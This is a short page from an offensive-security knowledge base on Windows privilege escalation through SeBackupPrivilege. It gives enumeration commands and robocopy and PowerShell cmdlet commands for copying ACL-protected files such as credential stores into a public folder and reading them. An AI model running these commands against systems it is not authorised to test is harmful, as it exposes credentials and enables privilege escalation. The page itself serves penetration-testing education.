Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 04. Windows / 02. Privilege Escalation / Privileges / SeBackupPrivilege

Protected File Copy

Protected file copy uses backup semantics to copy files that normal ACL checks would block.

This is useful for credential files, application secrets, configuration files, and other protected data. It becomes privilege escalation only when the copied material exposes credentials or a path to privileged execution.

When enumerating protected file copy opportunities, try to identify:

  • SeBackupPrivilege in the current token
  • The exact protected file path
  • A writable destination path
  • Whether the file is locked
  • Whether backup-aware copy tooling is available

Enumeration

Confirm the privilege:

whoami /priv

Check target file metadata:

dir /q "C:\Path\To\Protected\File.txt"
icacls "C:\Path\To\Protected\File.txt"

Interesting findings include:

  • Normal copy fails with access denied
  • Backup-aware copy succeeds
  • File contains credentials, keys, or privileged configuration

Once the target is confirmed, copy through backup semantics instead of normal file APIs.

Exploit

Use Robocopy in backup mode:

robocopy /B "C:\Path\To\Protected" "C:\Users\Public" File.txt

Copy with a SeBackup-aware helper if required:

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSeBackupPrivilege "C:\Path\To\Protected\File.txt" "C:\Users\Public\File.txt"

Review the copied file:

type C:\Users\Public\File.txt